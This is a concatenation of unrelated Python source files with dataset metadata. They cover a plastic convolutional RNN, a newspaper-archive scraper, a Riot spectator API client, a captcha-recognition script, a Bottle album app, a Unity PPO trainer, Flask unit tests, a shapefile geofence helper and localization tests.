            self.hebb = torch.zeros(N, self.C, self.C, self.K, self.K).float().to(xi)

        result = []
        for t, xt in enumerate(xiseq):
            xt = xt.squeeze(0)
            self.prev_h, self.hebb = self.forward_t(xt, self.prev_h, self.hebb)
            result.append(self.prev_h.unsqueeze(0))
        res = torch.cat(result, dim=0)
        return res

    def forward_t(self, xt, hin, hebb):
        """One time step: recurrent conv with (fixed + plastic) weights,
        then refresh the Hebbian trace from the (hin, hout) pair."""
        weights = hebb * self.alpha.unsqueeze(0) + self.fixed_weights
        hout = torch.tanh(convolutions(hin, weights) + xt)
        hebb = self.update_hebbian(hin, hout, hebb)
        return hout, hebb

    def update_hebbian(self, hin, hout, hebb):
        # Hebbian outer product of input patches and outputs, averaged over
        # spatial positions and reshaped into per-sample conv kernels,
        # accumulated into the trace with rate eta and clamped to [-1, 1].
        N, C, H, W = hout.shape
        hin_col = im2col(hin, self.K, self.P)
        delta = outer_conv(hin_col, hout)
        delta = delta.reshape(N, H*W, self.CK2, C).mean(dim=1)  # [N, CK2, C]
        delta = delta.reshape(N, C, self.K, self.K, self.C).permute(0, 1, 4, 2, 3)  # [N, C, C, K, K]
        hebb = (hebb + self.eta * delta).clamp_(-1, 1)
        return hebb

    def reset(self):
        # Drop carried state; the next forward() re-initialises h and the trace.
        self.prev_h = None
        self.hebb = None
if __name__ == '__main__':
    # Smoke test: T=10 timesteps, batch 5, 7 input channels, 16x16 frames.
    x = torch.rand(10, 5, 7, 16, 16)
    # BUG FIX: the class defined above is ConvPlastic (ConvPlasticCell does
    # not exist -> NameError), and it requires hidden_dim as well as
    # in_channels; 16 is an arbitrary small hidden size for the smoke test.
    net = ConvPlastic(7, 16)
    y = net(x)
print(y.shape) | etienne87/torch_object_rnn | core/convs/plastic_conv.py | plastic_conv.py | py | 4,185 | python | en | code | 9 | github-code | 36 | [
{
"api_name": "torch.nn.functional.unfold",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "torch.nn.functional",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "torch.bmm",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "torch.bmm",
... |
9747404267 | # Author: Ranjodh Singh
import requests
from bs4 import BeautifulSoup as bs
import os
# Crawl The Hindu archive: for every day listed, download each story into
# <year>/<month>/<day>/<n>.txt (headline followed by the body paragraphs).
url = "http://www.thehindu.com/archive/"
html = requests.get(url)
# NOTE(review): `__dict__['_content']` reaches into requests internals; the
# public equivalent is `html.content` — confirm and switch (used throughout).
soup = bs(html.__dict__['_content'], "html5lib")
container = soup.select("#archiveTodayContainer")
for link in container[0].find_all("a"):
    resp = requests.get(link['href'])
    soup = bs(resp.__dict__['_content'], "html5lib")
    daily_links = soup.select("[class~=ui-state-default]")
    for l in daily_links:
        web_link = l['href']
        # mirror the URL's .../<year>/<month>/<day>/... components on disk
        new_dir = "/".join(web_link.split("/")[-4:-1])
        os.makedirs(new_dir)
        s = bs(requests.get(web_link).__dict__['_content'], "html5lib")
        news_links = s.find_all('tr')[3].find_all('td')[-2].find_all("a")
        news_links = [i for i in news_links if "stories" in i['href']]
        print("Fetching news from ", web_link)
        for n in range(len(news_links)):
            news = bs(requests.get(web_link + news_links[n]['href']).__dict__['_content'], "html5lib")
            try:
                headline = news.find("h3").get_text()
            except:
                # pages without an <h3> get an empty headline
                headline = ""
            with open(new_dir + "/" + str(n) + ".txt", "w") as f:
                f.write(headline)
                # the last 4 paragraphs are boilerplate, per the slice below
                for x in news.find_all('p')[:-4]:
                    f.write(x.get_text())
| singhranjodh/the-hindu-archive-scraper | script.py | script.py | py | 1,304 | python | en | code | 7 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"li... |
25717533361 | from typing import Type, TypeVar, MutableMapping, Any, Iterable
from datapipelines import (
DataSource,
PipelineContext,
Query,
NotFoundError,
validate_query,
)
from .common import RiotAPIService, APINotFoundError
from ...data import Platform, Region
from ...dto.staticdata.version import VersionListDto
from ...dto.spectator import CurrentGameInfoDto, FeaturedGamesDto
from ..uniquekeys import convert_region_to_platform
T = TypeVar("T")
def _get_default_version(
    query: MutableMapping[str, Any], context: PipelineContext
) -> str:
    """Resolve the newest game-data version for the query's platform by
    asking the pipeline for the version list (first entry is the latest)."""
    pipeline = context[PipelineContext.Keys.PIPELINE]
    versions = pipeline.get(VersionListDto, {"platform": query["platform"]})
    return versions["versions"][0]
def _get_default_locale(
    query: MutableMapping[str, Any], context: PipelineContext
) -> str:
    """Fall back to the locale configured for the query's platform."""
    platform = query["platform"]
    return platform.default_locale
class SpectatorAPI(RiotAPIService):
    """Riot spectator-v4 endpoints: live game by summoner and featured games."""

    @DataSource.dispatch
    def get(
        self,
        type: Type[T],
        query: MutableMapping[str, Any],
        context: PipelineContext = None,
    ) -> T:
        # Dispatch stub; concrete handlers are registered below via
        # @get.register(<DtoType>).
        pass

    @DataSource.dispatch
    def get_many(
        self,
        type: Type[T],
        query: MutableMapping[str, Any],
        context: PipelineContext = None,
    ) -> Iterable[T]:
        # No bulk handlers are registered for this service.
        pass

    ################
    # Current Game #
    ################

    _validate_get_current_game_query = (
        Query.has("platform").as_(Platform).also.has("summoner.id").as_(str)
    )

    @get.register(CurrentGameInfoDto)
    @validate_query(_validate_get_current_game_query, convert_region_to_platform)
    def get_current_game(
        self, query: MutableMapping[str, Any], context: PipelineContext = None
    ) -> CurrentGameInfoDto:
        """Fetch the live game the given summoner is in; raises NotFoundError
        (wrapping the API 404) when they are not currently in a game."""
        url = "https://{platform}.api.riotgames.com/lol/spectator/v4/active-games/by-summoner/{id}".format(
            platform=query["platform"].value.lower(), id=query["summoner.id"]
        )
        try:
            app_limiter, method_limiter = self._get_rate_limiter(
                query["platform"], "spectator/active-games/by-summoner"
            )
            data = self._get(
                url, {}, app_limiter=app_limiter, method_limiter=method_limiter
            )
        except APINotFoundError as error:
            raise NotFoundError(str(error)) from error

        # Enrich the payload so downstream transformers know region/summoner.
        data["region"] = query["platform"].region.value
        data["summonerId"] = query["summoner.id"]
        return CurrentGameInfoDto(data)

    #################
    # Featured Game #
    #################

    _validate_get_featured_game_query = Query.has("platform").as_(Platform)

    @get.register(FeaturedGamesDto)
    @validate_query(_validate_get_featured_game_query, convert_region_to_platform)
    def get_featured_games(
        self, query: MutableMapping[str, Any], context: PipelineContext = None
    ) -> FeaturedGamesDto:
        """Fetch the platform's featured-games list, tagging each game with
        the region it was fetched for."""
        url = "https://{platform}.api.riotgames.com/lol/spectator/v4/featured-games".format(
            platform=query["platform"].value.lower()
        )
        try:
            app_limiter, method_limiter = self._get_rate_limiter(
                query["platform"], "featured-games"
            )
            data = self._get(
                url, {}, app_limiter=app_limiter, method_limiter=method_limiter
            )
        except APINotFoundError as error:
            raise NotFoundError(str(error)) from error

        data["region"] = query["platform"].region.value
        for game in data["gameList"]:
            game["region"] = data["region"]
        return FeaturedGamesDto(data)
| meraki-analytics/cassiopeia | cassiopeia/datastores/riotapi/spectator.py | spectator.py | py | 3,558 | python | en | code | 522 | github-code | 36 | [
{
"api_name": "typing.TypeVar",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "typing.MutableMapping",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "typing.Any",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "datapipelines.Pipelin... |
35940617435 | # -*- coding: utf-8 -*-
"""
Created on Thu Jul 30 16:21:28 2018
@author: bob.lee
"""
from src.model_test import image_cnn
from PIL import Image
import sys
def image_main(image_name):
    """Load a captcha image, normalise its pixels to [0, 1], and return the
    CNN's predicted text."""
    image = Image.open(image_name)
    # BUG FIX: PIL Image objects have no .flatten(), so the original raised
    # AttributeError. Convert to a numpy array first, then flatten and scale.
    # (Assumes image_cnn expects a flat float vector — confirm against the
    # model's input layer.)
    import numpy as np
    image = np.array(image).flatten() / 255
    predict_text = image_cnn(image)
    return predict_text
if __name__ == '__main__':
    # CLI usage: python main.py <image_path>  -> prints the predicted text
    result = image_main(sys.argv[1])
    print(result)
| lidunwei12/Verification_code | main.py | main.py | py | 420 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "PIL.Image.open",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "PIL.Image",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "src.model_test.image_cnn",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"lin... |
34717450162 | from bottle import route
from bottle import run
from bottle import request
from bottle import HTTPError
import album
@route("/albums/<artist>")
def albums(artist):
    """Return an HTML list of the artist's albums, or a 404 if none exist."""
    # album.find() (the `album` module) queries the DB for this artist's rows.
    albums_list = album.find(artist)
    if not albums_list:
        message = "Альбомов {} не найдено".format(artist)
        result = HTTPError(404, message)
    else:
        # IDIOM FIX: the original comprehension variable was named `album`,
        # shadowing the imported module inside the expression; renamed.
        album_names = [item.album for item in albums_list]
        result = "Список альбомов {} <br>".format(artist)
        result += "<br>".join(album_names)
    return result
@route("/albums", method="POST")
def make_album():
    """Create a new album from POSTed form fields and report the outcome."""
    year = request.forms.get("year")
    artist = request.forms.get("artist")
    genre = request.forms.get("genre")
    album_name = request.forms.get("album")

    # The year must parse as an integer before we touch the database.
    try:
        year = int(year)
    except ValueError:
        return HTTPError(400, "Год альбома введен неверно!")

    try:
        new_album = album.save(year, artist, genre, album_name)
    except AssertionError as err:
        # validation failure inside album.save
        return HTTPError(400, str(err))
    except album.AlreadyExists as err:
        # duplicate album -> conflict
        return HTTPError(409, str(err))

    print("Новый альбом с ID #{} успешно сохранен!".format(new_album.id))
    return "Альбом с ID #{} успешно сохранен".format(new_album.id)
if __name__ == "__main__":
    # Start the development server on localhost:8080.
    run(host="localhost", port=8080, debug=True)
{
"api_name": "album.find",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "bottle.HTTPError",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "album.album",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "bottle.route",
"line... |
30874171906 | import argparse
import os
import time
import gym
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
from PPO import PPO
from unity_wrapper_zzy import UnityWrapper
parser = argparse.ArgumentParser(description='Train or test neural net motor controller.')
# NOTE(review): with default=True, args.train is always truthy and the --train
# flag is a no-op; training runs even when only --test is passed — confirm
# whether the default should be False.
parser.add_argument('--train', dest='train', action='store_true', default=True)
parser.add_argument('--test', dest='test', action='store_true', default=False)
args = parser.parse_args()

#####################  hyper parameters  ####################

ENV_ID = 'CarVerification-2'  # environment id
RANDOM_SEED = 1  # random seed
RENDER = True  # render while training
ALG_NAME = 'PPO'
TRAIN_EPISODES = 3000  # total number of episodes for training
TEST_EPISODES = 10  # total number of episodes for testing
MAX_STEPS = 200  # total number of steps for each episode
# GAMMA = 0.9  # reward discount
# LR_A = 0.00001  # learning rate for actor0.00001
# LR_C = 0.00002  # learning rate for critic0.0005
BATCH_SIZE = 32  # update batch size
# ACTOR_UPDATE_STEPS = 10  # actor update steps
# CRITIC_UPDATE_STEPS = 10  # critic update steps
#
# # ppo-penalty parameters
# KL_TARGET = 0.01
# LAM = 0.5
#
# # ppo-clip parameters
# EPSILON = 0.2

# TensorBoard log directory, one folder per environment.
LogDir = os.path.join("logs/"+ENV_ID)
if __name__ == '__main__':
    # train_mode=False renders smoothly so training can be watched.
    if RENDER:
        env = UnityWrapper(train_mode=False, base_port=5004)
    else:
        env = UnityWrapper(train_mode=True, base_port=5004)

    obs_shape_list, d_action_dim, c_action_dim = env.init()
    print("obs_shape_list", obs_shape_list)
    print("d_action_dim:", d_action_dim)
    print("c_action_dim:", c_action_dim)
    agent = PPO(obs_shape_list[0], d_action_dim, c_action_dim, 1)

    t0 = time.time()
    if args.train:
        summary_writer = tf.summary.create_file_writer(LogDir)
        all_episode_reward = []
        for episode in range(TRAIN_EPISODES):
            obs_list = env.reset()
            # first observation of the first (only) agent
            state = obs_list[0][0]
            n_agents = obs_list[0].shape[0]
            episode_reward = 0
            for step in range(MAX_STEPS):  # in one episode
                if d_action_dim != 0:  # discrete action branch
                    d_action = agent.get_action(state, d_action_dim)
                    # one-hot encode the chosen action index for Unity
                    d_action_to_unity = np.eye(d_action_dim, dtype=np.int32)[d_action]
                    obs_list, reward, done, max_step = env.step(d_action_to_unity, None)
                    agent.store_transition(state, d_action, reward)
                else:  # continuous action branch
                    c_action = agent.get_action(state, d_action_dim)
                    # Unity expects a (n_agents, action_dim) array
                    c_action_to_unity = c_action[np.newaxis, :]
                    obs_list, reward, done, max_step = env.step(None, c_action_to_unity)
                    agent.store_transition(state, c_action, reward)
                state = obs_list[0][0]  # state = state_
                episode_reward += reward[0]
                # update ppo once a full batch of transitions is buffered
                if len(agent.state_buffer) >= BATCH_SIZE:
                    agent.finish_path(obs_list[0][0], done)
                    agent.update(d_action_dim)
                if done:
                    break
            agent.finish_path(obs_list[0][0], done)
            print(
                'Training | Episode: {}/{} | Episode Reward: {:.4f} | Running Time: {:.4f}'.format(
                    episode + 1, TRAIN_EPISODES, episode_reward, time.time() - t0)
            )
            # exponentially smoothed reward curve for plotting
            if episode == 0:
                all_episode_reward.append(episode_reward)
            else:
                all_episode_reward.append(all_episode_reward[-1] * 0.9 + episode_reward * 0.1)
            with summary_writer.as_default():  # TensorBoard writer for this run
                tf.summary.scalar('reward', episode_reward, step=episode)
        agent.save(ALG_NAME, ENV_ID)

        plt.plot(all_episode_reward)
        if not os.path.exists('image'):
            os.makedirs('image')
        plt.savefig(os.path.join('image', '_'.join([ALG_NAME, ENV_ID])))

    if args.test:
        # test with the saved policy; count episodes that reach `done`
        agent.load(ALG_NAME, ENV_ID)
        average_success_rate = 0
        for episode in range(TEST_EPISODES):
            obs_list = env.reset()
            state = obs_list[0][0]
            n_agents = obs_list[0].shape[0]
            episode_reward = 0
            success_tag = 0
            for step in range(MAX_STEPS):
                if d_action_dim != 0:  # discrete action branch
                    d_action = agent.get_action(state, d_action_dim)
                    d_action_to_unity = np.eye(d_action_dim, dtype=np.int32)[d_action]
                    obs_list, reward, done, max_step = env.step(d_action_to_unity, None)
                    # NOTE(review): `done` is treated as success here —
                    # confirm the env never sets done on failure/timeouts.
                    if done:
                        success_tag += 1
                    state = obs_list[0][0]
                    episode_reward += reward[0]
                else:  # continuous action branch
                    c_action = agent.get_action(state, d_action_dim)
                    c_action_to_unity = c_action[np.newaxis, :]
                    obs_list, reward, done, max_step = env.step(None, c_action_to_unity)
                    if done:
                        success_tag += 1
                    state = obs_list[0][0]  # state = state_
                    episode_reward += reward[0]
                if done:
                    break
            print("success:", success_tag)
            average_success_rate += success_tag
            print(
                'Testing | Episode: {}/{} | Episode Reward: {:.4f} | Running Time: {:.4f}'.format(
                    episode + 1, TEST_EPISODES, episode_reward,
                    time.time() - t0))
        print('Testing | Average Success Rate: {}'.format(
            average_success_rate/TEST_EPISODES))
{
"api_name": "argparse.ArgumentParser",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 40,
"usage_type": "attribute"
},
{
"api_name": "unity_wrapper_zzy.U... |
31414356277 | """Module test user information reource."""
import json
from unittest import mock
from flask import Response
from .base_test import BaseTestCase, Center, Cohort, Society
from api.utils.marshmallow_schemas import basic_info_schema
def info_mock(status_code, society=None, location=None, cohort=None, data=None):
    """Build a (cohort, location, response) triple imitating an Andela API call."""
    data = {} if not data else data
    api_response = Response()
    # Patch a .json() callable onto the flask Response so it quacks like a
    # requests response; `society` is accepted for caller convenience but is
    # not part of the returned triple.
    api_response.json = lambda: data
    api_response.status_code = status_code
    return cohort, location, api_response
class UserInformationTestCase(BaseTestCase):
    """Tests for the get-user-information resource.

    NOTE(review): relies on fixtures (self.nairobi, self.cohort_12_Ke,
    self.phoenix, self.test_user, ...) created by BaseTestCase — confirm
    against base_test.py.
    """

    def setUp(self):
        """Set up patch information for every test."""
        BaseTestCase.setUp(self)
        # Persist the fixtures this resource reads back from the DB.
        self.nairobi.save()
        self.cohort_12_Ke.save()
        self.successops_role.save()
        self.society = Society(name="iStelle")
        self.society.cohorts.append(self.cohort_12_Ke)
        self.society.save()
        self.successops_token = {"Authorization":
                                 self.generate_token(
                                     self.test_successops_payload)}
        cohort = self.cohort_12_Ke
        # Stub out the external ANDELA API call for every test in this class.
        # Individual tests may install a second patch over a different target.
        self.patcher = mock.patch('api.services.auth.helpers.add_extra_user_info',
                                  return_value=info_mock(200,
                                                         location=self.nairobi,
                                                         cohort=cohort,
                                                         society=self.society))
        self.patcher.start()

    def test_get_user_info_saved_in_DB(self):
        """Test retrieving already-saved user information successfully."""
        self.cohort_1_Nig.save()
        self.phoenix.cohorts.append(self.cohort_1_Nig)
        self.phoenix.save()
        self.test_user.save()
        # Single-user lookup succeeds for a normal token.
        response = self.client.get('/api/v1/users/-KdQsMt2U0ixIy_-yWTSZ',
                                   headers=self.header,
                                   content_type='application/json')
        self.assertEqual(response.status_code, 200)
        # Listing all users requires the SuccessOps role: 401 without it...
        response1 = self.client.get('/api/v1/users/all',
                                    headers=self.header,
                                    content_type='application/json')
        self.assertEqual(response1.status_code, 401)
        # ...and 200 with it.
        response2 = self.client.get('/api/v1/users/all',
                                    headers=self.successops_token,
                                    content_type='application/json')
        self.assertEqual(response2.status_code, 200)
        response_data = json.loads(response.data)
        # NOTE(review): location is asserted against self.lagos while the
        # cohort/society come from Nigeria fixtures — confirm the test_user
        # fixture is really located in Lagos.
        expected_location_data, _ = basic_info_schema.dump(self.lagos)
        self.assertDictEqual(response_data.get('data').get('location'),
                             expected_location_data)
        expected_society_data, _ = basic_info_schema.dump(self.phoenix)
        self.assertDictEqual(response_data.get('data').get('society'),
                             expected_society_data)
        expected_cohort_data, _ = basic_info_schema.dump(self.cohort_1_Nig)
        self.assertDictEqual(response_data.get('data').get('cohort'),
                             expected_cohort_data)

    def test_get_user_info_not_saved_in_DB(self):
        """Test retrieving user info from the ANDELA API successfully."""
        mock_location = Center(name='Mock-location')
        mock_location.save()
        mock_cohort = Cohort(name="mock_cohort", center=mock_location)
        mock_cohort.save()
        mock_society = Society(name="Mock-society")
        mock_society.cohorts.append(mock_cohort)
        mock_society.save()
        # Build the mock response the endpoint would receive from the API.
        user_mock_response = {
            'email': "mock.user.societies@andela.com",
            'first_name': "mock_user",
            'id': "-Krwrwahorgt-mock-user-id",
            'last_name': "mock_user",
            'picture': "https://www.link.com/picture_id",
            'location': {'id': mock_location.uuid},
            'cohort': {'id': mock_cohort.uuid},
            'roles': {
                "Andelan": "-Ktest_andelan_id",
                "Fellow": "-KXGy1EB1oimjQgFim6C"
            }
        }
        # Patch the endpoint-level import (different target than setUp's).
        patcher = mock.patch('api.endpoints.users.users.add_extra_user_info',
                             return_value=info_mock(200,
                                                    society=mock_society,
                                                    location=mock_location,
                                                    cohort=mock_cohort,
                                                    data=user_mock_response))
        patcher.start()
        response = self.client.get('/api/v1/users/-Krwrwahorgt-mock-user-id',
                                   headers=self.header,
                                   content_type='application/json')
        self.assertEqual(response.status_code, 200)
        response_data = json.loads(response.data)
        expected_location_data, _ = basic_info_schema.dump(mock_location)
        self.assertDictEqual(response_data.get('data').get('location'),
                             expected_location_data)
        expected_society_data, _ = basic_info_schema.dump(mock_society)
        self.assertDictEqual(response_data.get('data').get('society'),
                             expected_society_data)
        expected_cohort_data, _ = basic_info_schema.dump(mock_cohort)
        self.assertDictEqual(response_data.get('data').get('cohort'),
                             expected_cohort_data)
        patcher.stop()

    @mock.patch('api.endpoints.users.users.add_extra_user_info',
                return_value=info_mock(404, data={"error": "user not found"}))
    def test_get_user_info_404(self, mocked_func):
        """Test handles user not found."""
        response = self.client.get('/api/v1/users/-KoJA5HXKK5nVeIdc2Sv',
                                   headers=self.header,
                                   content_type='application/json')
        self.assertEqual(response.status_code, 404)
        response_data = json.loads(response.data)
        self.assertDictEqual(response_data, {"error": "user not found"})

    @mock.patch('api.endpoints.users.users.add_extra_user_info',
                return_value=info_mock(503, data={"Error": "Network Error"}))
    def test_get_user_info_503(self, mocked_func):
        """Test handles failed network connection correctly."""
        response = self.client.get('/api/v1/users/-KoJA5HXKK5nVeIdc2Sv',
                                   headers=self.header,
                                   content_type='application/json')
        self.assertEqual(response.status_code, 503)
        response_data = json.loads(response.data)
        self.assertDictEqual(response_data, {"Error": "Network Error"})

    @mock.patch('api.endpoints.users.users.add_extra_user_info',
                return_value=info_mock(500,
                                       data={"Error": "Something went wrong"}))
    def test_get_user_info_500(self, mocked_func):
        """Test handles unexpected API issues correctly."""
        response = self.client.get('/api/v1/users/-KoJA5HXKK5nVeIdc2Sv',
                                   headers=self.header,
                                   content_type='application/json')
        self.assertEqual(response.status_code, 500)
        response_data = json.loads(response.data)
        self.assertDictEqual(response_data, {"Error": "Something went wrong"})
| andela/andela-societies-backend | src/tests/test_user_information.py | test_user_information.py | py | 7,480 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "flask.Response",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "base_test.BaseTestCase",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "base_test.BaseTestCase.setUp",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "ba... |
20593599782 | # coding:utf-8
"""
Create by Wangmeng Song
July 21,2017
"""
import shapefile as sf
from shapely.geometry import Polygon, Point
import os
import inspect
import numpy as np
import json
# Directory holding the service-area shapefiles, next to this module.
filedir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))) + "/" + "area"
pingchearea = u'pincheArea.dbf'  # carpool area (already updated)
westoutside = u'area26.dbf'  # renamed to area26
eastpick = u'area28.dbf'  # east pickup area (area28)
westpick = u'area27.dbf'  # west pickup area (area27)
# Chengdu airport pickup / drop-off area files
chengdujieji = u'zhuanchejieji.dbf'
chengdusongji = u'zhuanchesongji.dbf'
# Yibin (no area file defined yet)
yibing = ''
# Mianyang (no area file defined yet)
mianyang = ''
# Chongqing (no area file defined yet)
chongqing = ''
# Xi'an (no area file defined yet)
xian = ''
# Area codes that lie on the east side of the map
ateastarray = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 27]
class SIDE:
    """Geofence helpers for ride scheduling.

    Classifies orders / pickup points against the service-area polygons
    stored as shapefiles under ``filedir``.  All public method signatures
    are unchanged; the identical polygon-loading code that used to be
    repeated in five methods now lives in ``_polygon_from``.
    """

    def _polygon_from(self, filepath):
        """Read the shapefile at *filepath* and return a shapely Polygon.

        Mirrors the legacy behaviour: if the file holds several shapes,
        only the points of the last one are used (each area file is
        expected to contain a single shape).
        """
        points = []
        for shape in sf.Reader(filepath).shapes():
            points = shape.points
        return Polygon(points)

    def ateast(self, orderNum, arealoclist):
        """Return an int array: 1 where the area code is in ``ateastarray``
        (east side of the map), 2 otherwise.

        NOTE(review): the result is sized by *orderNum* but only the first
        ``len(arealoclist)`` entries are filled — confirm callers always
        pass orderNum == len(arealoclist).
        """
        sideNo = np.zeros([orderNum], dtype=int)
        for i, area in enumerate(arealoclist):
            sideNo[i] = 1 if area in ateastarray else 2
        return sideNo

    def atwest2out(self, westLoc, orderNo):
        """For west-side points ([lat, lng] pairs): 1 if the point lies
        between the 2nd and 2.5th ring road, 2 if inside the 2nd ring."""
        polygon = self._polygon_from(filedir + "/" + westoutside)
        westsideNo = np.zeros([orderNo], dtype=int)
        for i, loc in enumerate(westLoc):
            point = Point(loc[1], loc[0])  # shapely expects (lng, lat)
            westsideNo[i] = 1 if polygon.contains(point) else 2
        return westsideNo

    def orderinchengdutwofive(self, orderdata):
        """Mark whether a carpool order lies inside the Chengdu carpool
        area ('inside' flag) and return the order as UTF-8 JSON bytes."""
        polygon = self._polygon_from(filedir + "/" + pingchearea)
        point = Point(orderdata['bdlng'], orderdata['bdlat'])
        orderdata['inside'] = bool(polygon.contains(point))
        return json.dumps(orderdata, ensure_ascii=False,
                          separators=(',', ':')).encode('utf-8')

    def judgeinarea(self, filepath, lat, lng):
        """Return True when (lat, lng) falls inside the polygon stored at
        *filepath*."""
        return bool(self._polygon_from(filepath).contains(Point(lng, lat)))

    def specificitywholeChengDu(self, SpecificityOrderdata):
        """Decide, per city, whether an airport pickup/drop-off order is
        inside the served area; return the order as UTF-8 JSON bytes.

        triptype: 1 = airport pickup, 2 = airport drop-off.
        NOTE(review): an unrecognised city code leaves 'inside' unset,
        exactly as before — downstream readers should use .get('inside').
        """
        try:
            city = SpecificityOrderdata['city']
        except KeyError:  # no city code supplied: default to Chengdu
            city = 510100
        tripnum = SpecificityOrderdata['triptype']
        lng = SpecificityOrderdata['bdlng']
        lat = SpecificityOrderdata['bdlat']
        if city == 'YBP':  # Yibin: no polygon defined yet, always outside
            SpecificityOrderdata['inside'] = False
        elif city == 510700:  # Mianyang: no polygon yet, always inside
            SpecificityOrderdata['inside'] = True
        elif city == 'CKG':  # Chongqing: no polygon yet, always outside
            SpecificityOrderdata['inside'] = False
        elif city == 610100:  # Xi'an: no polygon yet, always inside
            SpecificityOrderdata['inside'] = True
        elif city == 510100:  # Chengdu: check the pickup/drop-off polygon
            if tripnum == 1:  # airport pickup
                latfilename = filedir + "/" + chengdujieji
            else:  # airport drop-off
                latfilename = filedir + "/" + chengdusongji
            SpecificityOrderdata['inside'] = self.judgeinarea(latfilename, lat, lng)
        return json.dumps(SpecificityOrderdata, ensure_ascii=False,
                          separators=(',', ':')).encode('utf-8')

    def eastpick(self, pickpoint):
        """True when the [lat, lng] pickup point lies in the east pickup
        area.  (The bare name ``eastpick`` below resolves to the
        module-level shapefile name, not this method.)"""
        return self.judgeinarea(filedir + "/" + eastpick,
                                pickpoint[0], pickpoint[1])

    def westpick(self, pickpoint):
        """True when the [lat, lng] pickup point lies in the west pickup
        area."""
        return self.judgeinarea(filedir + "/" + westpick,
                                pickpoint[0], pickpoint[1])
| Octoberr/Auto_Schedule | recomTimeOnTheBus/eastandwestside.py | eastandwestside.py | py | 7,983 | python | en | code | 6 | github-code | 36 | [
{
"api_name": "os.path.dirname",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "inspect.getfile",
"l... |
71245259624 | # -*- coding: utf-8 -*-
# pylint: disable-msg=W0403,W0603,C0111,C0103,W0142,C0301
""" partialy stolen from python locale tests ;)
requires nose (easy_install nose)
nosetests -v --with-coverage --cover-package=localization test_localization.py
"""
from django.conf import settings
settings.configure(DEBUG=True,
)
import nose
import locale
import sys
from localization import (setlocale, format, atoi, atof, _normalize,
nl_langinfo, localeconv)
OLD_LOCALE_TM = None  # LC_TIME saved by setup_tm(), restored by tear_down_tm()


def setup_tm():
    """ setup for date/time tests: remember the current LC_TIME locale """
    global OLD_LOCALE_TM
    OLD_LOCALE_TM = locale.setlocale(locale.LC_TIME)
#


def tear_down_tm():
    """ cleanup for date/time tests: restore the saved LC_TIME locale """
    locale.setlocale(locale.LC_TIME, OLD_LOCALE_TM)
#

OLD_LOCALE_NUM = None  # LC_NUMERIC saved by setup_num(), restored by tear_down_num()


def setup_num():
    """ setup for numeric tests: remember the current LC_NUMERIC locale """
    global OLD_LOCALE_NUM
    OLD_LOCALE_NUM = locale.setlocale(locale.LC_NUMERIC)
#


def tear_down_num():
    """ cleanup for numeric tests: restore the saved LC_NUMERIC locale """
    locale.setlocale(locale.LC_NUMERIC, OLD_LOCALE_NUM)
#
# setup locale list and ensure that C and en comes first
CANDIDATE_LOCALES = [x[0] for x in [('C', 1), ('en', 1)]]# + list(settings.LANGUAGES)]
# Remember the process-wide numeric locale, then pin LC_NUMERIC to an
# English locale; the spelling differs per platform.
OLD_LOCALE_NUM = locale.setlocale(locale.LC_NUMERIC)
if sys.platform.startswith("win"):
    locale.setlocale(locale.LC_NUMERIC, "en")
elif sys.platform.startswith("freebsd"):
    locale.setlocale(locale.LC_NUMERIC, "en_US.US-ASCII")
else:
    locale.setlocale(locale.LC_NUMERIC, "en_US")
#
# BASE FUNCTIONALITY
def test_number_format():
    """format() must follow English conventions, with and without grouping."""
    setlocale('en')
    cases = (
        # w/o grouping
        (("%f", 1024), '1024.000000'),
        (("%f", 102), '102.000000'),
        (("%f", -42), '-42.000000'),
        (("%+f", -42), '-42.000000'),
        (("%20.f", -42), '                 -42'),
        (("%+10.f", -4200), '     -4200'),
        (("%-10.f", 4200), '4200      '),
        # with grouping (trailing 1 enables the thousands separator)
        (("%f", 1024, 1), '1,024.000000'),
        (("%f", 102, 1), '102.000000'),
        (("%f", -42, 1), '-42.000000'),
        (("%+f", -42, 1), '-42.000000'),
        (("%20.f", -42, 1), '                 -42'),
        (("%+10.f", -4200, 1), '    -4,200'),
        (("%-10.f", 4200, 1), '4,200     '),
    )
    for call_args, expected in cases:
        actual = format(*call_args)
        assert actual == expected, '%r != %r' % (actual, expected)
#
def _set_locale(what, loc):
try:
locale.setlocale(what, loc)
except locale.Error:
locale.setlocale(what, '')
#
@nose.with_setup(setup_num, tear_down_num)
def test_conversion():
    """Round trip: format() output must parse back via atoi()/atof()."""
    setlocale('en')
    # INT
    val = 123456789
    s1 = format("%d", 123456789, 1)
    assert s1 == '123,456,789', '%r != %r' % (val, s1)
    assert val == atoi(s1), '%r != %r' % (val, atoi(s1))
    # FLOAT
    val = 123456789.14
    s1 = str(val)
    s2 = format("%.2f", val, 1)
    assert s2 == '123,456,789.14', '%r != %r' % (val, s2)
    assert val == atof(s1), '%r != %r' % (val, atof(s1))
#
@nose.with_setup(setup_num, tear_down_num)
